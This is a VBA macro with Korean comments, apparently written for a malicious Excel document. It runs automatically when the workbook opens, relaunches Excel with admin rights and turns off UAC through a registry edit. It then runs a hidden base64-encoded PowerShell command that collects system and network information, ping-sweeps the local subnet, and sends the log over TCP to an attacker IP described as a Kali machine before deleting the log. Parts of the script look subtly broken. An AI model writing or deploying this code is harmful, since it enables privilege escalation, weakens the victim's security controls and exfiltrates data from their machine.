' =======================================
' 최종 Base64 안정화 VBA 코드
' PowerShell 오류를 완전히 제거하고 실행 안정성을 극대화했습니다.
' =======================================

Sub Auto_Open()
    ' Excel 파일이 열릴 때 자동으로 실행됩니다.
    On Error Resume Next
    
    Dim tempFilePath As String
    ' 재실행 확인 플래그는 APPDATA에 저장
    tempFilePath = Environ$("APPDATA") & "\Flag_Admin_Rerun.txt"
    
    If Dir(tempFilePath) = "" Then
        ' 1차 실행: 관리자 권한으로 재실행 시도
        CreateObject("Scripting.FileSystemObject").CreateTextFile tempFilePath, True
        RestartExcelAsAdmin
    Else
        ' 2차 실행: 관리자 권한으로 실행되었으므로 작업 수행
        Kill tempFilePath
        
        ' UAC 비활성화 (팀원 코드를 참고하여 재구성)
        DisableUAC
        
        ' 시스템 정보 수집 및 Netcat 전송 수행
        PerformInternalScanAndExfiltrate
        
        ' 작업 완료 메시지
        MsgBox "데이터 수집 및 전송 작업이 완료되었습니다.", vbInformation, "시스템 작업 완료"
    End If
End Sub

' 관리자 권한으로 엑셀 재실행
Private Sub RestartExcelAsAdmin()
    Dim shellApp As Object
    Dim excelPath As String
    Dim workbookPath As String

    workbookPath = ThisWorkbook.FullName
    excelPath = Application.Path & "\EXCEL.EXE"

    Set shellApp = CreateObject("Shell.Application")
    shellApp.ShellExecute excelPath, """" & workbookPath & """", "", "runas", 1
    
    Application.Quit
End Sub

' UAC 비활성화
Private Sub DisableUAC()
    Dim objShell As Object
    Dim regCommand As String
    regCommand = "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "cmd.exe /c " & regCommand, 0, True
End Sub

' Base64 인코딩을 수행하는 함수
Function Base64Encode(text As String) As String
    Dim XML As Object
    Dim B As Object
    Set XML = CreateObject("MSXML2.DOMDocument")
    Set B = XML.createElement("b64")
    B.DataType = "bin.base64"
    B.Text = StrConv(text, vbUnicode) ' PowerShell은 UTF-16LE을 기대하므로 vbUnicode로 변환
    Base64Encode = B.Text
    Set XML = Nothing
    Set B = Nothing
End Function

' 시스템 정보 수집, 내부 스캐닝 및 데이터 유출 함수
Sub PerformInternalScanAndExfiltrate()
    Dim shell As Object
    Dim psScript As String
    Dim Base64EncodedScript As String
    Dim psCommand As String
    
    ' 1. Kali IP 및 Port 설정 (반드시 수정하세요!)
    Dim Attacker_IP As String: Attacker_IP = "10.44.44.44" ' <-- IP 주소 수정
    Dim Attacker_Port As String: Attacker_Port = "443"    ' <-- 포트 번호 수정
    
    Set shell = CreateObject("WScript.Shell")
    On Error GoTo ErrorHandler 
    
    ' -----------------------------------------------------------------------------
    ' Step 1: PowerShell 스크립트 (문자열) 정의
    ' -----------------------------------------------------------------------------
    ' 이 스크립트에는 VBA 문자열 충돌이 발생할 수 있는 복잡한 구문이 포함되지 않습니다.
    ' IP와 Port는 스크립트 내부에서 설정됩니다.
    psScript = "powershell -NoP -NonI -WindowStyle Hidden -Exec Bypass -Command """ & _
               "$Log_File = $env:APPDATA + '\collected_sys_info.log';" & _
               "$Attacker_IP = '" & Attacker_IP & "';" & _
               "$Attacker_Port = '" & Attacker_Port & "';" & _
               "Add-Content -Path $Log_File -Value ('--- Collection Time: ' + (Get-Date).ToString('yyyy-MM-dd HH:mm:ss') + ' ---') -Encoding Default;" & _
               "cmd /c 'systeminfo >> ' + $Log_File + ' & echo. >> ' + $Log_File + ' & ipconfig /all >> ' + $Log_File + ' & echo. >> ' + $Log_File + ' & netstat -ano >> ' + $Log_File + ' & echo. >> ' + $Log_File + ' & tasklist /v >> ' + $Log_File;" & _
               "Add-Content -Path $Log_File -Value '--- Internal Network Scan (192.168/10.x Ping Sweep) ---' -Encoding Default -ErrorAction SilentlyContinue;" & _
               "$ipPrefix=(Get-NetIPConfiguration | Select-Object IPv4Address | Where-Object { $_.IPv4Address -like '192.168*' -or $_.IPv4Address -like '10*' } | Select-Object -First 1).IPv4Address.Split('.')[-4,-3,-2] -join '.'; " & _
               "if ($ipPrefix) { 1..254 | ForEach-Object { $ip=$ipPrefix+'.' + $_; if(Test-Connection -ComputerName $ip -Count 1 -ErrorAction Ignore -Quiet) { 'Host ' + $ip + ' is UP' | Add-Content -Path $L -Encoding Default } } };" & _
               "Start-Sleep -s 5;" & _
               "try {" & _
               "  [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;" & _
               "  $C=New-Object System.Net.Sockets.TcpClient($Attacker_IP,$Attacker_Port);" & _
               "  $S=$C.GetStream();" & _
               "  $F=[System.IO.File]::ReadAllBytes($Log_File);" & _
               "  $S.Write($F,0,$F.Length);" & _
               "  Start-Sleep -s 5;" & _
               "  $S.Close();" & _
               "} catch {} finally {" & _
               "  if ($C) {$C.Close()};" & _
               "  Remove-Item $Log_File -ErrorAction SilentlyContinue;" & _
               "}"""

    ' -----------------------------------------------------------------------------
    ' Step 2: 스크립트 인코딩 및 실행
    ' -----------------------------------------------------------------------------
    
    ' PowerShell은 Base64 명령 실행 시 UTF-16LE 인코딩을 기대하므로 vbUnicode로 인코딩합니다.
    Base64EncodedScript = Base64Encode(psScript)
    
    ' 최종 실행 명령 (Base64 인코딩된 스크립트 실행)
    psCommand = "powershell.exe -NoProfile -EncodedCommand " & Base64EncodedScript
    
    ' 0: 숨김, True: 명령이 완료될 때까지 VBA 대기 (동기화)
    shell.Run psCommand, 0, True 

ErrorHandler:
    Set shell = Nothing

End Sub